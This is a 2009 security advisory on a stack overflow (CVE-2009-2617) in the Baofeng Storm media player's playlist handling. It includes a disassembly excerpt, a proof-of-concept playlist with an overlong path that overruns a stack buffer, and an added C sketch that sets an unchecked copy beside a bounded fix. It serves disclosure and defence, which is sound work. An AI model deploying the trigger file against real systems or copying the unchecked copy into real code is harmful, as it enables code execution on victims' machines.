Baofeng Media Player playlist stack overflow

Published: 2009.07.28
Credit: Jambalaya
Risk: High
CWE: CWE-119
CVE: CVE-2009-2617
Local: No
Remote: Yes

CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete





Baofeng Media Player playlist stack overflow vulnerability

By Jambalaya of Nevis Labs
Date: 2009.06.24


Vendor:
Baofeng

Affected:
Storm 3.9.62
*Other versions may also be affected

Overview:
Baofeng is a widely popular media player in China that plays many common
media file formats. Almost 120 million customers in China use the Baofeng
media player.

Details:
The specific flaw exists in medialib.dll. The stack overflow vulnerability
is due to the way it incorrectly handles the smpl file type, which is a
playlist. Successfully exploiting this vulnerability allows attackers to
execute arbitrary code on a vulnerable installation.

The vulnerability can be triggered by passing a long path, because the
length of the path is never validated:

.text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
.text:1000567B sub_1000567B proc near ; DATA XREF: .rdata:100248D4o
.text:1000567B
.text:1000567B FileName = word ptr -628h
.text:1000567B var_10 = dword ptr -10h
.text:1000567B var_C = dword ptr -0Ch
.text:1000567B var_4 = dword ptr -4
.text:1000567B pszUrl = dword ptr 8
.text:1000567B pcchPath = dword ptr 0Ch
.text:1000567B
.text:1000567B mov eax, offset sub_100221F8
.text:10005680 call __EH_prolog
.text:10005685 sub esp, 61Ch
.text:1000568B push ebx
.text:1000568C push esi
.text:1000568D mov esi, [ebp+pszUrl]
.text:10005690 mov [ebp+var_10], ecx
.text:10005693 test esi, esi
.text:10005695 jz loc_1000577D
.text:1000569B mov ebx, [ebp+pcchPath]
.text:1000569E test ebx, ebx
.text:100056A0 jz loc_1000577D
.text:100056A6 push edi
.text:100056A7 push esi ; pszPath
.text:100056A8 xor edi, edi
.text:100056AA mov [ebp+pcchPath], 208h
.text:100056B1 call ds:PathIsURLW
.text:100056B7 test eax, eax
.text:100056B9 jz short loc_100056E0
.text:100056BB push 3 ; UrlIs
.text:100056BD push esi ; pszUrl
.text:100056BE call ds:UrlIsW
.text:100056C4 test eax, eax
.text:100056C6 jz short loc_100056E0
.text:100056E0 loc_100056E0: ; CODE XREF: sub_1000567B+3Ej
.text:100056E0 ; sub_1000567B+4Bj
.text:100056E0 lea eax, [ebp+FileName]
.text:100056E6 push esi
.text:100056E7 push eax
.text:100056E8 call ds:StrCpyW
<--------------------- strcpy directly, without any length check.

Proof of concept:
<playlist><item name="2.GIF" source="C:\Documents and
Settings\Linlin\&#192;&#195;&#230;\2.GIF" duration="0"/><item name="0001.gif"
source="C:\Documents and
Settings\Linlin\&#192;&#195;&#230;\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" duration="0"/></playlist>
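The following C example is added here and is not Baofeng's code or part of the advisory: it models the pattern in the listing above (a fixed-size wide-character stack buffer filled by an unbounded copy of the playlist's source path) next to a bounded version that rejects overlong paths before copying. PATH_CCH, the function names and the sample paths are assumptions.

```c
#include <stddef.h>
#include <wchar.h>
/* Added illustration, not Baofeng's code. PATH_CCH mirrors the 208h the
 * routine stores in pcchPath but never enforces; names are assumptions. */
#define PATH_CCH 0x208u

/* Shape of the flawed routine: fixed stack buffer plus an unbounded copy.
 * A playlist "source" longer than PATH_CCH-1 characters overruns the frame,
 * which is what the overlong path in the PoC does. Shown for contrast only. */
int resolve_path_unchecked(const wchar_t *src)
{
    wchar_t filename[PATH_CCH];
    wcscpy(filename, src);          /* StrCpyW equivalent: no length check */
    return (int)wcslen(filename);
}

/* Hardened form: reject what does not fit, then copy with an explicit bound
 * and a guaranteed terminator. Returns characters copied, or -1 if too long. */
int resolve_path_checked(const wchar_t *src, wchar_t *dst, size_t dst_cch)
{
    if (src == NULL || dst == NULL || dst_cch == 0)
        return -1;
    size_t n = wcslen(src);
    if (n >= dst_cch)               /* need room for the L'\0' */
        return -1;
    wmemcpy(dst, src, n + 1);
    return (int)n;
}

/* Demo: a constructed path of `len` repeated 'r's, like the PoC's
 * repeated-letter run, offered to the checked copy. */
int check_source_length(size_t len)
{
    static wchar_t src[4096];
    wchar_t dst[PATH_CCH];
    if (len >= sizeof src / sizeof src[0])
        return -1;
    wmemset(src, L'r', len);
    src[len] = L'\0';
    return resolve_path_checked(src, dst, PATH_CCH);
}

/* Demo: a benign entry shaped like the PoC's first item (constructed; the
 * non-ASCII directory component is left out). */
int check_benign_entry(void)
{
    wchar_t dst[PATH_CCH];
    return resolve_path_checked(L"C:\\Documents and Settings\\Linlin\\2.GIF",
                                dst, PATH_CCH);
}
```

The checked copy accepts at most PATH_CCH-1 characters, so the PoC's multi-hundred-character source attribute is refused instead of reaching the stack frame.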


Greetz to those friends who I have long time no see T_T: Pratik Dixit, Sanjay
Pendse, Winny Thomas, ajit.hatti

Vendor Response:
2009.06.16 Vendor notified via email
2009.06.25 Vendor released a new version







_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

